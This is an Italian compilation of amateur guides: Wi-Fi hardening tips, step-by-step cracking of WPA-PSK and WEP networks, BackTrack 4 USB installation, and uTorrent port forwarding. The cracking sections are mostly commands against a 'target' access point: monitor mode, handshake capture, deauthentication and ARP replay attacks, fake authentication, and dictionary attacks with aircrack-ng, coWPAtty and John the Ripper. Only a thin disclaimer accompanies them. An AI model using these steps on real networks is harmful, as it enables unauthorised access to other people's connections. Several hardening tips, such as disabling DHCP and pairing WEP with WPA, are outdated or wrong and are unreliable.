Proteggere le reti Wireless

Le reti wireless, o Wi-Fi, hanno portato una rivoluzione importante nella nostra società.

Sono molto comode, ma purtroppo molto insicure.

Questa guida vuole fornire al lettore i suggerimenti su come rendere sicuro il collegamento wireless.

Ma perché dobbiamo rendere sicura la nostra rete wireless?

Ecco alcuni motivi:

♣ violazione della privacy: il vostro hard disk potrebbe essere copiato e i file al suo interno essere

modificati o eliminati. Inoltre potrebbero anche essere installati programmi keystroker, che

leggono e memorizzano tutti i caratteri alfanumerici premuti da vuoi sulla tastiera (e quindi ad

esempio se avete fatto un acquisto on-line i numeri della vostra carta di credito);

♣ il vostro traffico di rete potrebbe essere controllato: potrebbe essere analizzato tutto il vostro

traffico di rete e le pagine web che state visitando in tempo reale, con tanto di password che

vengono inserite durante la navigazione;

♣ la vostra connessione potrebbe essere utilizzata per scopi illegali: la tua connessione potrebbe

essere utilizzata per scaricare illegalmente musica, film coperti da copryright oppure per la

condivisione di materiale pedo-pornografico. Infine potrebbero anche penetrare nel vostro

computer virus e malware.

Non bisogna essere degli esperti di informatica per aumentare il livello di sicurezza delle vostre reti wireless. Bisognerà soltanto seguire questa semplice e chiara guida.


Ecco le operazioni che dovrete eseguire per proteggere la vostra rete wireless.

♠ cambiare la password di amministrazione del vostro AP: la password di ogni access

point (AP) di qualsiasi marca viene impostata in fabbrica. E’ importante quindi cambiare la

password in modo che sia lunga almeno 8 caratteri contenenti numeri e lettere In questo modo

potrebbe essere scoperta semplicemente facendo una ricerca molto accurato su internet, tramite

il famoso motore di ricerca Google. Ecco la prova: vi abbiamo allegato una tabella con password

di default solamente di alcune marche di scheda o router wireless presente sul mercato:

♠ cambiare gli SSID della vostra rete: dovremo cambiare il Service Set Identifier identifica ogni

punto di accesso all’interno della vostra rete. In altre parole l’SSID è un parametro che il router

emette su tutti i dispositivi che rientrano nel suo raggio d’azione;

♠ utilizzare degli SSID non descrittivi: usare degli SSID descrittivi si intende non utilizzare il vostro

nome e cognome, indirizzo e telefono perché sono informazione accessibili da chiunque.

Utilizzate piuttosto lettere e numeri in modo alternato;

♠ disabilitare il broadcast SSID: tutti gli access point mandano a intervalli regolari Beacon Frames

per la sincronizzazione che servono al cliente per impostare la configurazione automatica con la

vostra rete di accesso. Purtroppo contengono gli SSID che potrebbero essere catturati da degli

aggressori per eseguire una attacco alla vostra rete wireless. In altre parole, con questa

operazione disabilitiamo la funzione “Wireless Zero Configuration” che è presente su Windows

XP o altre piattaforme. In questo modo rendiamo la nostra rete wireless non sarà più visibile

nella lista delle reti disponibili;

♠ spegnere l’access point quando non lo si utilizza: questa è la più semplice e utile contromisura

(che serve anche a risparmiare qualche € all’anno di corrente elettrica). Se per qualche motivo

(molto particolare) non potete togliere la corrente elettrica, è sempre possibile disattivare la radio

Wireless interna del vostro router attraverso il menù del vostro access point;

♠ aggiornare il firmaware: occorre controllare (soprattutto dopo parecchi mesi che avete comprato

il vostro access point) che il vostro access point abbia l’ultimo livello di firmare consigliato dal

produttore. Questo lo potrete controllare direttamente dal sito ufficiale del vostro prodotto;

♠ filtrare gli indirizzi MAC: ciascun computer collegato da una rete è identificato dall’indirizzo MAC

che funziona come marchio per ogni scheda wireless. In questo modo potremo specificare gli

indirizzi MAC al nostro router. Come facciamo a sapere quale indirizzo MAC usa la nostra

scheda wireless? E’ molto semplice:

▫ start -> Esegui…

▫ scrivere cmd

▫ ora che si è aperto il prompt del dos scrivere: ipconfig /all

▫ ora abbiamo le informazioni della nostra configurazione di rete

▫ l’indirizzo MAC è presente nell’ultima riga di comando chiamata indirizzo fisico

▫ scrivere exit per uscire dal dos e tornare a Windows;

♠ cambiare la community di default di SNMP: su molti access point è installato un agente SNMP

(Simple Network Management Protocol). Dobbiamo correttamente configurare la community

password, in modo da evitare che qualche aggressore possa ricavare preziose informazioni sul

vostro access point;

♠ non utilizzare come protezione solamente il WEP: il WEP (Wired Equivalent Privacy) è un

protocollo di sicurezza per crittografare i nostri files di rete. E’ un protocollo molto vulnerabile e

per questo dovrete utilizzare insieme al WEP anche il WPA. Il WPA (Wireless Protected Access)

è un altro protocollo di sicurezza molto più sicuro e non vulnerabile (almeno per il momento). Se

disponete di un access point un po’ vecchiotto che può solamente utilizzare il WEP, vi consiglio

di cambiarlo con uno più recente. In questo modo avrete una doppia sicurezza sulla vostra rete


♠ non utilizzare il DHCP: il DHCP (Dynamic Host Configuration Protocol, ovvero protocollo IETF) è un

meccanismo che permette la distribuzione automatica degli indirizzi IP a tutti i clienti che si collegano

all’access point. In questo modo qualsiasi cliente può ottenere il vostro indirizzo IP e connettersi alla vostra

rete. Una volta disabilitato il DHCP, dobbiamo assegnare manualmente gli indirizzi IP ad ogni computer

che vogliamo collegare alla nostra rete wireless. Nell’assegnare manualmente gli indirizzi IP, non

dobbiamo utilizzare quelli di default facilmente intuibili, come per esempio o

Utilizziamone qualcuno di più imprevedibile, come per esempio o;

♠ limitare l’intensità del segnale wireless: siccome le onde radio non si possono limitare dobbiamo

scegliere una adeguata sistemazione del nostro access point all’interno del nostro edificio in

modo da fornire un sufficiente collegamento solamente nella nostra zona che ci interessa e non

all’esterno. Questo compito risulta molto difficile e per questo vi posso consigliare di non

sistemare il vostro access point vicino a delle finestre e utilizzare delle antenne a basso

guadagno di decibel.


Crakkare una rete Wi-fi con chiave WPA

Innanzitutto dobbiamo dire che il WPA fornisce due diverse modalità di autenticazione: RADIUS e PSK, la prima è praticamente inespugnabile, mentre una WLAN che utilizza PSK (la maggior parte) può essere attaccata tramite la cattura dell’handshake, per fare questo è necessario che almeno un client sia collegato alla rete bersaglio.
Come distro di riferimento useremo anche questa volta Backtrack 3.
Iniziamo a divertirci….

Innanzitutto dobbiamo mettere la scheda wi-fi in modalità Monitor mode, quindi apriamo un terminale ed eseguiamo:
airmon-ng start eth1 11
chiaramente al posto di eth1 dobbiamo scrivere l’interfaccia della nostra scheda di rete e al posto di 11 inseriamo il canale utilizzato dall’access point bersaglio (vedi articolo precedente reti WEP).
Adesso eseguiamo airodump-ng, con la seguente sintassi:
airodump-ng –bssid [mac address access bersaglio] –channel [numero canale] -w wpa [interfaccia nostra scheda]
Ricordo che per avere informazioni su il MAC Address dell’access point basterà usare Kismet (vedi qui).
Adesso dobbiamo attendere…che un client si connetta alla rete,e nel momento in cui accadrà,nella nostra finestra dove abbiamo eseguito airodump-ng comparirà:
WPA handshake: 00:13:ce:c6:05:53

L’attacco deve essere rapido e può capitare che nessun client si connetta, in questo caso è possibile forzare la deautenticazione del client cosicchè sarà costretto a riautenticarsi e noi saremo pronti per catturare i dati necessari dell’handshake.
Per far ciò apriamo un terminale (lasciando aperta quella di airodump-ng) ed esguiamo aireplay-ng, adesso è il momento di impiegare un Deauthentication Attack!
Il comando da usare sarà:
aireplay-ng -0 1 -a [BSSID] -c CLIENT eth1
Al posto di BSSID inseriremo il MAC address dell’access point bersaglio e al posto di CLIENT scriveremo l’indirizzo MAC del client. Per individuare ul client basta lanciare Kismet e seguire la guida qui.
Adesso che abbiamo i pacchetti di Handshake non ci resta che individuare la passphrase, per far ciò, il metodo più semplice è quello di fare un attacco a forza bruta.

Iniziamo con lo scaricare una wordlist (un elenco che ci aiuterà per rubare la passphrase), per il dizionario italiano, quindi apriamo una shell e digitiamo:
Adesso possiamo dare questo file a aircrack-ng insieme al file di handshake.
Apriamo un terminale e scriviamo:

aircrack-ng -b [mac address access bersaglio] -w [percorso completo della wordlist creata prima][file contenente handshake]

Dato che questo metodo sarà molto lento, possiamo vedere di fare qualcosa per velocizzare tutto, precalcolando l’hash. Per fare questo si usa il programma coWPAtty. Adesso dobbiamo generare una tabella degli hash, inserendo l’SSID dell’access point (con Kismet lo troviamo) e un file dizionario (va bene quello che già abbiamo). Adesso possiamo richiamare coWPAtty.

Apriamo un terminale ed eseguiamo:
cd/pentest/wireless/coWPAtty:’genpmk -s [SSID] -f wordlist -d tabella_hash’.SSID
creata la tabella degli hash eseguiamo coWPAtty:
./cowpatty -d [nome tabella hash] -s [nome rete da attaccare] -r [file con i pacchetti di handshake]
Se la passphrase è composta da una parola comune ma con delle lettere variate,per esempio”casa!”…abbiamo bisogno di un tool che proverà queste permutazioni: John the Ripper

apriamo un terminale e scriviamo:
john—rules –wordlist=[nome dizionario] –stdout | /pentest/wireless/cowpatty/cowpatty -f- -s [SSDI rete bersaglio] -r [file con handshake]

Prima di tutto tengo a precisare che l’uso che si fa delle conoscenze dipende dalla persona…quindi questa guida non vuole assolutamente incitare nessuno all’uso illegale di queste tecniche, quindi per i vari test che farete vi consiglio di usare la vostra rete wi-fi! In questo modo potrete verificare con quanta facilità si riesce ad avere accesso ad una rete protetta….


Crakkare una rete Wi-fi con chiave WEP

Oggi tratterò un argomento un pò particolare…craccare una rete wi-fi con chiave WEP

Prima di tutto tengo a precisare che l’uso che si fa delle conoscenze dipende dalla persona…quindi questa guida non vuole assolutamente incitare nessuno all’uso illegale di queste tecniche, quindi per i vari test che farete vi consiglio di usare la vostra rete wi-fi! In questo modo potrete verificare con quanta facilità si riesce ad avere accesso ad una rete protetta….

Detto questo preambolo d’obbligo…adesso è arrivato il momento di divertirsi….

Ho scelto di utilizzare una distro con già installato tutto quello di cui avremo bisogno: Backtrack 3, ma comunque tengo a precisare che i programmi in questione si possono scaricare nella maggior parte delle distro…quindi nessun problema!

Avviamo la nostra Backtrack in modalità live (per esempio da USB)…possiamo seguire questa guida qua.

I passi da seguire sono i seguenti:

Individuare un bersaglio, rete più debole con protezione più bassa


Avviamo Kismet: K–>backtrack–>Radio Network Analysis–>80211–>Analyser–>Kismet

Ordiniamo le reti: premiamo S e poi Q , la rete più in alto è quella con il segnale più forte, selezioniamo quella in cima e premiamo invio.

Informazioni: comparirà una lunga serie di dati sull’access point. Le linee da leggere sono SSID, BSSID, Channel, Encrypt, per uscire q e poi Q. (consiglio di appuntarsi questi dati)

Impostare la scheda di rete del pc in Monitor Mode (Kismet lo fa in automatico ma se lo chiudiamo dobbiamo farlo manualmente)


Apriamo un terminale, eseguimao airmon-ng per individuare l’interfaccia della scheda di rete.

Eseguiamo airmon-ng stop eth0 (se è eth0 la vostra interfaccia di rete)

Eseguiamo airmon-ng start eth0 11 , così facendo abbiamo abilitato la modalità monitor, 11 è il canale (Channel) utilizzato dall’access point bersaglio, canale che abbiamo scritto precedentemente su un foglio.

Catturiamo il traffico:


Eseguiamo: airodump-ng -c 11 -bssid 00:80:5A:47 –ivs -w wep eth0 chiaramente dobbiamo sostituire con i valori appropriati che abbiamo sul nostro pc/access point;

11: numero di canale (Channel)

00:80:5A:47: BSSID dell’access point

–ivs: catturiamo solo i pacchetti iv

wep: suffisso del file (verrà creato un file wep-01.ivs)

Adesso dobbiamo tener conto della colonna #Data che sono il numero di iv catturati

Velocizziamo la cattura degli iv (Arp Request Replay)


Apriamo una shell senza chiudere quella di airodump-ng, scriviamo il comando:

aireplay-ng -3 -b 00:80:5A:47 -h 00:13:Ce:C6 eth0 , cambiando con i valori appropriati

-3: indica di usare l’attacco arp request replay

00:80:5A:47: MAC address dell’access point

00:13:Ce:C6: MAC del client associato alla rete IMPORTANTE: per conoscere il mac basta usare kismet, premere S e Q, selezionare il bersaglio e premere C

Se non ci fossero client dobbiamo falsificarne uno:

ARP Request Replay con Fake Authentication


eseguire da terminale:

aireplay-ng -1 0 -e SSID -a BSSID -h MACinterfaccia eth0

con i valori appropriati:

-1:indica al programma di effettuare una fake authentication

0: stabilisce il ritardo tra un attacco e il successivo

SSID:della rete bersaglio

BSSID: della rete bersaglio

MAC:della nostra scheda wi-fi

per acquisire il nostro mac…apriamo un terminale e diamo ifconfig

Per esempio:

aireplay-ng -1 0 -e wireless -a 00:80:5A:47:0B:01 -h 00:13:Ce:C6:05:53 eth0

Quando nella finestra di airodump-ng i pacchetti sono 100.000 possiamo iniziare a craccare.

Apriamo una nuova shell e scriviamo:


aircrack-ng -a 1 -b 00:80:5A:47 -n64 wep-01.ivs

con i valori appropriati:

1: protocollo WEP

-n64: ricerca chiavi a 64 bit (se dopo migliaia di iv la chiave non viene trovata rifacciamo senza -64)

Se vogliamo possiamo provare il programma che potrebbe craccare la chiave in due minuti, si chiama: wesside-ng

wesside-ng -i interfaccia -a MAC -v BSSID

con valori appropriati:

interfaccia: la nostra interfaccia di rete

MAC: mac address della scheda

BSSID: access point bersaglio

La scheda deve essere in monitor mode

Bene! Siamo arrivati alla fine….non vi resta che provare l’emozione di vedere scritto Key Found!!

aspetto suggerimenti e pareri….la prossima volta vedremo di craccare le chiavi WPA!!


Vi posto qui sotto, e secondo me è il link più sicuro, dove potrete scaricare la BT4

fatene buon uso!!!

Installare Backtrack 4 Beta su USB con Persistent Changes


Diamo per scontato che avete questi requisiti:

1. Sapete partizionare un disco
2. Conoscete Backtrack
3. Conoscete quantomento Linux
4. Conoscete Windows

Materiale occorrente:

1. Una pendrive di almento 2 gb
2. Una distribuzione già esistente di Backtrack 3 o 4 su cd/dvd da utilizzare in live per svolgere le operazioni necessarie
3. UNetbootin – L’utility di cui avevamo già parlato in precedenza che serve a creare distro live su usb

Possiamo iniziare!

Partizionare la pen drive

Prendete il cd o dvd di Backtrack 3 o 4 (l’avevamo accennato tra i prerequisiti). Avviamolo da boot e facciamo partire backtrack.

Utilizzeremo qparted per partizionare la pendrive.

Prendo ad esempio una pen drive da 4 GB perchè è quella che utilizzo io, ma come ho detto basta già una da 2 giga se non si usa spessissimo (altrimenti i log la riempiono ).

Creiamo le seguenti partizioni:

1. La prima partizione deve essere una partizione primaria di 1.2 gb e formattata di FAT32.
2. La seconda partizione invece deve essere grande quanto il resto della pen drive e formattata in ext2.

Rendere la pen drive avviabile

Scarichiamo la iso dvd di backtrack 4 da

Avviamo UNetbootin e inseriamo la pen drive. Selezioniamo come distribuzione backtrack 3 e come sorgente la iso (o il dvd vero e proprio) di Backtrack 4 e come destinazione la pen drive che abbiamo partizionato e diamo OK.

Persistent Changes

Il persistent mode di backtrack 4 và attivato come per backtrack 3.


Avviamo Backtrack 4 e montiamo la seconda partizione che avevamo precedentemente formattato in ext2.

Creiamoci all’interno una cartella per contenere i cambiamenti.

Per fare ciò digitiamo sul terminale:

1. mount /dev/sdb2 /mnt/sdb2
2. cd /mnt/sdb2
3. mkdir changes

Adesso dobbiamo apportare dei cambiamente all’avvio di Backtrack 4.

Sempre sul terminale digitiamo:

1. cd /boot/syslinux
2. chmod +Xx lilo
3. chmod +Xx syslinux

Apriamo adesso syslinux.cfg con un editor qualsiasi. Ad esempio nano digitando nano syslinux.cfg

1. cerchiamo la riga “LABEL BT4″.
2. Copiamo questa e le successive 3 righe e incolliamole subito sotto quelle già esistenti (così avremo una nuova opzione all’avvio)
3. Cambiamo “LABEL BT4″ in qualcosa del tipo “LABEL BT4-persistent” e la descrizione in qualcosa tipo “MENU LABEL BT4 Beta – Console – Persistent”
4. Cambiamo la riga che inizia con APPEND nella sezione che abbiamo incollato aggiungendo “changes=/dev/sdx2″ subito dopo “root=/dev/ram0 rw” dove x è la lettera della vostra pendrive in backtrack (per me è sdb ma può variare). Nel mio caso la riga diventa così: “….root=/dev/ram0 rw changes=/dev/sdb2….”
5. Salvate i cambiamenti e uscite.

Adesso riavviando e selezionando la nuova opzione appena creata dovreste essere in modalità persistent, basta provare a salvare un file sul desktop, riavviare e rientrare nella stessa modalità per capire se il tutto funziona.

Questo è quanto per dubbi o chiarimenti sono sempre a disposizione 😉 Resta di fatto che se non avete particolarità e/o esigenze consiglio di aspettare la release definitiva che non dovrebbe tardare molto ad essere disponibile…

Installare BackTrack 4 beta USB

Guida per gli utenti Windows che vogliono installre back track su penna usb (la penna deve essere di almeno 2 gb):

* Scaricate la iso di back track 4 beta da;
* scompattate la iso nella chiavetta;
* verificate quale lettera ha attribuito Windows alla vostra chiavetta usb (supponiamo Z:);
* apriamo il prompt ms-dos e digitiamo Z: (invio) e poi bootinst.bat (invio ed attendiamo).

Finito! ora potete provare ad avviare back track…

Lasciate la penna usb inserita, riavviate il pc e cambiate l’ordine di boot dal bios, in modo da far partire per prima la chiavetta.


Ciao a tutti, ho deciso di fare questa piccola guida per aiutare chi magari come me cerca da sempre di aprire queste benedette porte del router per aumentare la velocità di trasferimento dei propri download. Ho preso in esame come software utorrent nella versione e come router un D-link wi-fi modello DSL G604T. Ovviamente do per scontato che prima di fare le operazioni che andrò a descrivere, sul vostro leopardo avete già provveduto con le impostazioni firewall.

Per prima cosa andiamo ad aprire uTorrent e andando sulle preferenze e nello specifico nell’ultima maschera chiamata “NETWORK” andiamo ad inserire il numero della porta che desideriamo adoperare. Io ho adoperato la porta 5061

Fatto questo andiamo ad aprire le impostazioni del nostro router inserendo nel browser da noi utilizzato l’indirizzo 192.168…. ed accedendo con le nostre credenzali andiamo sul menù che ci porta alla gestione delle porte nel caso del nostro router il percorso sarà ADVANCED —>PORT FORWARDING

ci troveremo davanti le varie impostazioni di default del router per prima cosa sceglieremo la connessione di riferimento (libero, telecom…) l’indirizo Lan ovvero l’indirizzo ip del nostro mac ( solitamente cambia soltanto l’ultima cifra dell’indirizzo 192.168…) e per finire andremo sul radio USER e cliccheremo su ADD (in basso) per inserire una nostra regola personalizzata.

una volta in questa schermata andiamo a compilare i campi come vedete nell’immagine ovvero diamo un nome a nostro piacimento a questa regola scegliamo come protocollo TCP,UDP ed inseriamo nei campi che richiedono le porte la nostra che abbiamo scelto all’inizio ovvero la 5061 e per terminare clicchiamo su APPLY.
A questo punto in basso, per esteso, dovrebbe apparire la nostra regola appena creata.

Fatto ciò torniamo alla schermata PORT FORWARDING, sempre sull’impostazione user adesso troveremo la regola da noi creata, adesso non ci resta che cliccare su ADD per far memorizzare il tutto al router ed infine APPLY…ed il gioco è fatto!

Spero di essere stato chiaro con questa piccola guida molto amatoriale..Ovviamente sono sempre a disposizioni per ulteriori chiarimenti.

Questa guida è stata offerta da


